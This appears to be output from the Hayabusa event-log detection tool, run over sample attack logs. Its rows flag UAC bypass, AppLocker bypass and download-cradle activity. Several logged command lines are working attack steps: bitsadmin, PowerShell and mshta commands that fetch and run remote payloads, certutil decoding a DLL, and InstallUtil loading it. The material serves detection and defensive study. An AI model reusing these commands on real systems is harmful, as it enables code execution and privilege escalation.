CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Copy From or To 
System32,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-26 16:39:14.935 +09:00,MSEDGEWIN10,1,high,Evas | Exec,HTML Help Shell Spawn,,../hayabusa-rules/sigma/process_creation/proc_creation_win_html_help_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_Exec_CompiledHTML.evtx +2019-07-28 07:43:41.424 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Downloads\UACBypass.exe"" | Process: C:\Users\IEUser\Downloads\UACBypass.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x235cdd | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:41.424 +09:00,MSEDGEWIN10,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:41.755 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,ProvEsc - UAC Bypass Mocking Trusted WinFolders | Path: C:\Windows \System32 | Process: C:\Users\IEUser\Downloads\UACBypass.exe | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500,../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:41.755 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,ProvEsc - UAC Bypass Mocking Trusted WinFolders | Path: C:\Windows \System32\winSAT.exe | Process: C:\Users\IEUser\Downloads\UACBypass.exe | PID: 6632 | PGUID: 
747F3D96-D39D-5D3C-0000-001026F55500,../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:41.757 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:41.757 +09:00,MSEDGEWIN10,11,medium,,File Created_Sysmon Alert,ProvEsc - UAC Bypass Mocking Trusted WinFolders | Path: C:\Windows \System32\WINMM.dll | Process: C:\Users\IEUser\Downloads\UACBypass.exe | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500,../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"PrivEsc - UACBypass Mocking Trusted WinFolders | Cmd: ""C:\Windows \System32\winSAT.exe"" formal | Process: C:\Windows \System32\winSAT.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\UACBypass.exe"" | LID: 0x235cdd | PID: 7128 | PGUID: 747F3D96-D39D-5D3C-0000-0010131E5600 | Hash: SHA1=C6B8FDB2ED8FA8A20CD7348E221A18443EF8510B,MD5=BA2ED9D3420FC7F43CB0E535AE8A042C,SHA256=5BD1CD3B86A26DE22ED2C6CDD552C0DAD499B2F1BA1E5A85AF2FB78CFF5D502A,IMPHASH=6F82B876C4C1039B7980A9F0C8B57991",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,1,critical,Evas,TrustedPath UAC Bypass Pattern,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\IEUser\Downloads\UACBypass.exe | Tgt Process: C:\Windows \System32\winSAT.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 6632 | Src PGUID: 747F3D96-D39D-5D3C-0000-001026F55500 | Tgt PID: 7128 | Tgt PGUID: 747F3D96-D39D-5D3C-0000-0010131E5600,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:42.161 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 6820 324 0000022557280720 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 4028 | PGUID: 747F3D96-D39E-5D3C-0000-0010EF395600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:42.392 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"PrivEsc - UACBypass Mocking Trusted WinFolders | Cmd: ""C:\Windows \System32\winSAT.exe"" formal | Process: C:\Windows \System32\winSAT.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\UACBypass.exe"" | LID: 0x235bee | PID: 3904 | PGUID: 747F3D96-D39E-5D3C-0000-0010805A5600 | Hash: SHA1=C6B8FDB2ED8FA8A20CD7348E221A18443EF8510B,MD5=BA2ED9D3420FC7F43CB0E535AE8A042C,SHA256=5BD1CD3B86A26DE22ED2C6CDD552C0DAD499B2F1BA1E5A85AF2FB78CFF5D502A,IMPHASH=6F82B876C4C1039B7980A9F0C8B57991",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:42.392 +09:00,MSEDGEWIN10,1,critical,Evas,TrustedPath UAC Bypass 
Pattern,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:42.938 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Downloads\UACBypass.exe | PID: 6632 | PGUID: 747F3D96-D39D-5D3C-0000-001026F55500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-28 07:43:43.016 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"PrivEsc - UACBypass Mocking Trusted WinFolders | Image: C:\Windows \System32\WINMM.dll | Process: C:\Windows \System32\winSAT.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3904 | PGUID: 747F3D96-D39E-5D3C-0000-0010805A5600 | Hash: SHA1=7CE46211A5A8D7FE4A767E12BD80769673FDAEE5,MD5=7F8A2B842948EB70133FA34F0CFE772B,SHA256=078CA38607F24FD21A563FA5189843734677B98D5017D5EBB03B2960053B25B5,IMPHASH=14E2B78EE82AD03FAC47525FEDDCA7E6",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx +2019-07-30 06:11:11.156 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\Downloads\Invoice@0582.cpl | Process: C:\Windows\Explorer.EXE | PID: 4600 | PGUID: 747F3D96-6056-5D3F-0000-0010C9EF4100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:17.364 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\control.exe"" ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | Process: C:\Windows\System32\control.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x4131b5 | PID: 4996 | PGUID: 
747F3D96-60F5-5D3F-0000-0010A7B65500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:17.587 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\control.exe"" ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | LID: 0x4131b5 | PID: 4356 | PGUID: 747F3D96-60F5-5D3F-0000-0010D1CF5500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:17.587 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:17.621 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | LID: 0x4131b5 | PID: 4884 | PGUID: 747F3D96-60F5-5D3F-0000-0010A8D75500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:17.621 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Call by Ordinal,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:19.098 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: 
""C:\Windows\System32\wscript.exe"" /e:JScript.Encode /nologo C:\Users\IEUser\AppData\Local\Temp\info.txt | Process: C:\Windows\SysWOW64\wscript.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", | LID: 0x4131b5 | PID: 6160 | PGUID: 747F3D96-60F7-5D3F-0000-00106F2F5600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:11:19.098 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious Script Execution From Temp Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx +2019-07-30 06:32:55.583 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 6336 362 00000298E04230D0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6424 | PGUID: 747F3D96-6607-5D3F-0000-0010B3818500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:57.633 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x413182 | PID: 1208 | PGUID: 747F3D96-6609-5D3F-0000-00109FBF8500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:58.659 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c certutil -f -decode fi.b64 AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser 
| Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3184 | PGUID: 747F3D96-660A-5D3F-0000-0010B9E08500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:58.659 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:58.711 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2576 | PGUID: 747F3D96-660A-5D3F-0000-001048E58500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:59.234 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: certutil -f -decode fi.b64 AllTheThings.dll | Process: C:\Windows\System32\certutil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c certutil -f -decode fi.b64 AllTheThings.dll | LID: 0x413182 | PID: 700 | PGUID: 747F3D96-660A-5D3F-0000-0010FFF28500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:59.234 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:59.582 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\AllTheThings.dll | Process: 
C:\Windows\system32\certutil.exe | PID: 700 | PGUID: 747F3D96-660A-5D3F-0000-0010FFF28500,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:59.582 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.193 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6020 | PGUID: 747F3D96-660F-5D3F-0000-00109B328600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.254 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2948 | PGUID: 747F3D96-660F-5D3F-0000-001055378600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.254 +09:00,MSEDGEWIN10,1,medium,Exec,Windows Suspicious Use Of Web Request in 
CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.886 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" | Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" | LID: 0x413182 | PID: 3896 | PGUID: 747F3D96-660F-5D3F-0000-00100F4F8600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.886 +09:00,MSEDGEWIN10,1,medium,Evas | Persis,Bitsadmin Download,,../hayabusa-rules/sigma/process_creation/proc_creation_win_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 | LID: 0x413182 | PID: 6720 | PGUID: 
747F3D96-660F-5D3F-0000-00106B508600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,high,Evas | Persis,Suspicious Bitsadmin Job via PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_powershell_bitsjob.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:04.008 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3756 | PGUID: 747F3D96-660F-5D3F-0000-00104D5B8600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:08.202 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 108 | PGUID: 
747F3D96-6614-5D3F-0000-001093CE8600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:08.202 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:08.318 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 7156 | PGUID: 747F3D96-6614-5D3F-0000-00104ED38600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | LID: 0x413182 | PID: 5696 | PGUID: 747F3D96-6614-5D3F-0000-0010BFD98600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Execution of InstallUtil Without Log,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_instalutil.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker 
Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:13.214 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5116 | PGUID: 747F3D96-6619-5D3F-0000-0010FDE78600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:13.214 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:13.225 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3224 | PGUID: 747F3D96-6619-5D3F-0000-0010BEE98600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:18.286 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 776 | PGUID: 
747F3D96-661E-5D3F-0000-0010A3148700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:18.310 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6756 | PGUID: 747F3D96-661E-5D3F-0000-00103F168700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); | Process: C:\Windows\System32\mshta.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c mshta.exe 